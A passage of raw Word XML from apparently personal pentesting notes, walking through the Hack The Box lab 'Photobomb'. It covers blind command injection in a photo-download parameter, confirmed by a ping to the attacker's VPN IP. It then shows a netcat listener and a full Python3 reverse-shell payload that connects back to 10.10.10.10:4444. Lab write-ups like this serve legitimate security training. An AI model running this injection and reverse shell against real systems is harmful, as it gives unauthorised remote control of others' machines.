            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mr-tuhin/CVE-2021-22204-exiftool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1039">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">third</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup does the entire exploit manually!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yl4wv72ffzqz" w:id="417"/>
      <w:bookmarkEnd w:id="417"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Photos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ue48tfjcijon" w:id="418"/>
      <w:bookmarkEnd w:id="418"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection for downloading photos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the Photobomb easy HTB, when downloading photos, we see three parameters in the Burpsuite request: photo, filetype, dimensions. We can try command injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EEB">
      <w:pPr>
        <w:ind w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7710488" cy="2619589"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="493" name="image484.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image484.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId296"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7710488" cy="26195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EEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, send the request to the Repeater Tab so we can try things easier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we attempt to test for a command injection vulnerability by entering a semi-colon (which is a delimiter for commands in Bash as well as most scripting languages) into each field, followed by the command id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The application does not return any useful output within the HTTP response, so a different technique is required for testing. Doesn't mean that the commands aren't vulnerable, it just means that it doesn't show any output so maybe it involves </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blind command injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we don't see any visible output of confirmation!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="95" name="image86.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image86.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297"/>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EF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -ni tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We proceed to edit the command that we are attempting to inject to a ping command, which if successful will send ICMP packets to the specified address. To capture such packets, we set up a tcpdump for all ICMP traffic on the tun0 interface of our local machine, which is by default used by our lab VPN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF4">
      <w:pPr>
        <w:ind w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7745720" cy="2532255"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="157" name="image154.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image154.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId298"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7745720" cy="25322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EF5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also make sure to account for the spaces and any other special characters in our payload by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encoding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command by selecting it and pressing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the BurpSuite repeater, so as to ensure the application properly processes it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command (before URL-encoding) is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" limits the number of ping requests to 3. Default runs it indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="550"/>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10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your HOST IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We attempt pasting our payload into all three of the parameters, one at a time, until we see the packets on our tcpdump. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows us to check which parameter is vulnerable to command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="251" name="image155.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image155.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29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EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get the ICMP packets for the filetype parameter!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Successful blind command injection!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can use this command injection to get a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to set up a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We proceed to try out different </w:t>
      </w:r>
      <w:hyperlink r:id="rId1040">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">payloads </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">until one gives us a callback to our listener. After some testing, we try out a Python3 payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export RHOST="</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">";export RPORT=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it (select the text inside Repeater and then press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to ensure the application passes the request properly; the final POST request looks as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
